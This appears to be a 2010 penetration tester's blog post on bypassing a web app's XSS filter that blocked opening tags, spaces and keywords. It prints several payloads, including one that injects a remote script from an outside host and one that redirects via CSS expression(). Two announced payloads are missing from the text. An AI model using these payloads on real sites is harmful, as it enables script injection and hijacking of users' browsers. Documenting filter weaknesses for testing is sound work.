Bypassing XSS Filters

Testing web applications can be a frustrating experience especially when you keep seeing the same developer mistakes over and over again. In one of the web apps I recently tested, the developer was not sanitizing user input the right way. Why they didn't escape harmful characters I do not know. Instead, it looked like they were fixated on filtering just the opening HTML tags. For example...

<script> was filtered but </script> was not.
<iframe> was filtered but </iframe> was not.

I tried different methods to get <script> past their filter but nothing seemed to worked. I was pretty sure there was a XSS vulnerability but I just could not get my opening HTML tag to get through. So then I thought that since the closing HTML tags work, why not use that instead. I came up with these two filter bypasses:

"></a style="background:url(javascript:alert('xss'))">
"></ style="background:url(javascript:alert('xss'))">

I then went back and tried a couple of other harmless HTML tags to better understand what it was filtering:

<i> and </i> were allowed but <i > was filtered.
<br> and </br> were allowed but <br > was filtered.

I noticed that if a letter followed the < sign and a space appeared within a tag, then it was filtered. Hmmm, why don't I just eliminate the space then? I came up with these additional bypasses:


In another part of the same application, the user could email an article to a friend. The form included a text box that the user could enter a comment but Javascript, HTML code, and URLs were all filtered.

It looked like the same filter as the one above was used so opening HTML tags were blocked but closing ones were not. It did not like any spaces within the tags nor the word "script". To detect HTML code, it looked for the presence of the > sign. URLs were detected through the use of "http".

Here's what I came up with that bypassed their filters:

</a/style=color:expression(location.href='ht'+'tp://google .com');%0d>

One of the challenges I faced was how to reference an external Javascript file. While the following link works, I wanted to see if there were other methods.

"><i/style="background:url(javascript:document.write(\"<scr\"+\"ipt src='http://website/1.js'></script>\"))">

Searching the web yielded no other alternatives. There must be another way! After playing with this for awhile, I found that this works quite nicely.


I'm going to keep trying because I'm sure there are other ways to do this.

Posted on: 11/29/2010